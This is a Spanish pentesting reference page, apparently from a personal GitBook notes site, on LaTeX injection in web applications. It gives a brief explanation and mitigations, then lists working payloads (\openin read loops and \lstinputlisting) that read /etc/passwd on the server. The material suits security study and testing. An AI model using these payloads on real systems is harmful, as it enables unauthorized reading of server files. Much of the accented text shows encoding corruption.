馃
Gzzcoo Pentest Notes
HomeWalkthroughs
  • Home
  • ACTIVE DIRECTORY PENTESTING
    • Initial Enumeration
      • Enumerating users
    • Abusing Active Directory ACLs/ACEs
      • Shadow Credentials
      • GenericWrite
      • ForceChangePassword
    • Active Directory Certificate Services (ADCS)
    • Attacking Kerberos
    • BloodHound
    • Tools
      • bloodyAD
      • Kerbrute
      • Impacket
      • ldapsearch
      • PowerView.py
  • WINDOWS PENTESTING
    • Windows Privilege Escalation
      • Abusing Tokens
      • AD Recycle Bin Group
      • DnsAdmins to DomainAdmin
      • Dumping credentials
        • Credential Hunting
        • LSASS
        • NTDS.dit
        • SAM and SYSTEM
      • Server Operators Group
  • Windows Lateral Movement
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
      • From Windows
      • From Linux
    • Pass the Cert (PtC)
  • File Transfer
    • PowerShell
    • Remote Desktop Protocol (RDP)
    • LOLBAS
    • Protected File Transfers
    • Catching Files over HTTP/S
    • Detection and Evading Detection
  • Reverse Shell
  • PowerShell
  • LINUX PENTESTING
    • Basic Enumeration
    • Linux Privilege Escalation
  • File Transfer
    • Protected File Transfers
    • Catching Files over HTTP/S
    • GTFOBins
  • Shells
  • Reverse Shell
  • Credential Hunting
  • Passwd, Shadow & Opasswd
  • NETWORK SERVICES PENTESTING
    • FTP Port (21)
    • SSH Port (22)
    • DNS Port (53)
    • SMB Port (139, 445)
    • MSSQL Port (1433)
    • MySQL Port (3306)
    • RDP Port (3389)
  • PostgreSQL Port (5432, 5433)
  • Attacking Email Services
  • Pivoting, Tunneling and Port Forwarding
  • WEB PENTESTING
    • Local File Inclusion (LFI)
  • LaTeX Injection
  • Cypher Injection
  • Cross-Site Scripting (XSS)
  • TOOLS
    • John The Ripper
    • NetExec
    • Smbmap
    • Evil-WinRM
  • REVERSING
    • Windows executables and DLL's
    • Android APK
Con tecnolog铆a de GitBook
LogoLogo

漏 2025 Gzzcoo Corp.

En esta p谩gina
  • Introduction
  • Payloads

驴Te fue 煤til?

Exportar como PDF

LaTeX Injection

Introduction

Las inyecciones LaTeX son un tipo de ataque que se aprovecha de las vulnerabilidades en las aplicaciones web que permiten a los usuarios ingresar texto formateado en LaTeX. LaTeX es un sistema de composici贸n de textos que se utiliza com煤nmente en la escritura acad茅mica y cient铆fica.

Los ataques de inyecci贸n LaTeX ocurren cuando un atacante ingresa c贸digo LaTeX malicioso en un campo de entrada de texto que luego se procesa en una aplicaci贸n web. El c贸digo LaTeX puede ser dise帽ado para aprovechar vulnerabilidades en la aplicaci贸n y ejecutar c贸digo malicioso en el servidor.

Un ejemplo de una inyecci贸n LaTeX podr铆a ser un ataque que aprovecha la capacidad de LaTeX para incluir gr谩ficos y archivos en una aplicaci贸n web. Un atacante podr铆a enviar un c贸digo LaTeX que incluya un enlace a un archivo malicioso, como un virus o un troyano, que podr铆a infectar el servidor o los sistemas de la red.

Para evitar las inyecciones LaTeX, las aplicaciones web deben validar y limpiar adecuadamente los datos que se reciben antes de procesarlos en LaTeX. Esto incluye la eliminaci贸n de caracteres especiales y la limitaci贸n de los comandos que pueden ser ejecutados en LaTeX.

Tambi茅n es importante que las aplicaciones web se ejecuten con privilegios m铆nimos en la red y que se monitoreen regularmente las actividades de la aplicaci贸n para detectar posibles inyecciones. Adem谩s, se debe fomentar la educaci贸n sobre la seguridad en el uso de LaTeX y c贸mo evitar la introducci贸n de c贸digo malicioso.

Payloads

Leer primera l铆nea de un archivo

\newread\file
    \openin\file=/etc/passwd
    \read\file to\line
    \text{\line}
\closein\file

Leer m煤ltiples lineas de un archivo

\lstinputlisting{/etc/passwd}
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file
\lstinputlisting{/etc/passwd}
$\lstinputlisting{/etc/passwd}$
AnteriorLocal File Inclusion (LFI)SiguienteCypher Injection

脷ltima actualizaci贸n hace 3 meses

驴Te fue 煤til?